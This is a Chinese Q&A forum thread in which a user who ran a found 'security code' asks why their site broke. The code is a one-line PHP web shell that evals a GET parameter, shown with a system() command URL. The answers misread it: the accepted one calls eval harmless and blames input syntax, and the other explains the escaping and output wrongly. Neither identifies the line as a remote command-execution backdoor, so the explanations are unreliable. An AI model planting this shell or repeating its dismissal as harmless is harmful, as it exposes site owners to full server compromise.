php高手时进,求教<? eval(stripcslashes($_GET['e']));?>
我在网上看到安全类代码,然后在自己写的程序中运行了一下,出现问题了,网页变形,部份页面打开空白,请问是这么回事,能解释下面代码的意思吗,谢谢了。还有网站要如何才能恢复。求...
我在网上看到安全类代码,然后在自己写的程序中运行了一下,出现问题了,网页变形,部份页面打开空白,请问是这么回事,能解释下面代码的意思吗,谢谢了。还有网站要如何才能恢复。求教啊
php代码<? eval(stripcslashes($_GET['e']));?>
地址栏提交xxx.php?e=system(string $command) 展开
php代码<? eval(stripcslashes($_GET['e']));?>
地址栏提交xxx.php?e=system(string $command) 展开
3个回答
展开全部
你要看一下get_magic_quotes_gpc ()函数是否有转义的字符串?直接echo $_GET['e'];然后复制到php看是不是正确的代码。或者将输出,直接放在网页中看一下是不是格式错误?
我觉得eval本身没有错,应该是$_GET['e']内容的问题,可能不符合php语法要求。
我觉得eval本身没有错,应该是$_GET['e']内容的问题,可能不符合php语法要求。
本回答被提问者采纳
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
<?php
eval(stripcslashes($_GET['e']));//先stripcslashes,先转义,是预防变量提前执行,
xxx.php?e=system(string $command)// 命令行下执行$command命令;得出的结果赋给e;
本回答被网友采纳
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
更多回答(1)
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询
